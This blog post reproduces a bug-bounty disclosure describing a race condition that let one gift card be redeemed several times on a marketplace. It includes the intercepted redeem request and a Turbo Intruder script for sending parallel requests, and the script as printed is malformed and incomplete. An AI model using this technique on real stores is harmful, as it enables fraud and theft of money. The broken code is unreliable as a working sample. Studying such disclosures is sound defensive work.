This blog is all about Cyber Security and IT

Race Condition Bug

While Reading about Race Condition , I found an interesting report on hackerone . Below is a report submitted by Juho Myllys (muon4)


Hello team!

I've found a Race Condition vulnerability which allows to redeem gift cards multiple times. This how a s/he can easily buy stuff just buying one gift card and redeem it over and over again.

Steps to reproduce


  • Burp Suite Pro
  • Turbo Intruder

Note: This also can be reproduced other way but this is maybe the easiest

The attack

  • Login
  • Buy a gift card
  • Now redeem it at<lang>/redeem
  • Intercept the request which will be following:
POST /fi/redeem HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Connection: keep-alive
Cookie: <cookies>

utf8=%E2%9C%93&authenticity_token=<CSRF token>&token=<GIFT card>&commit=Redeem+Now
  • Send it to the turbo intruder
  • Use this python code as a payload of the turbo intruder
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,

   for i in range(30):
    engine.queue(target.req, i)
        engine.queue(target.req, target.baseInput, gate='race1')



def handleResponse(req, interesting):
  • Now set the external HTTP header x-request: %s - This is needed by the turbo intruder
  • Click "Attack"
  • See multiple 200 OK responses:

  • Check your Reverb bucks and see that you have a way more money than the gift card actually was worth of:

In my case I bought one gift card which was worth of 25$ and as we can see from the picture I was able to redeem it 7 times which makes 25*7 = 175$.

If you need any information please let me know.



Race Condition can be used for get almost free stuff and steal money.


Post a Comment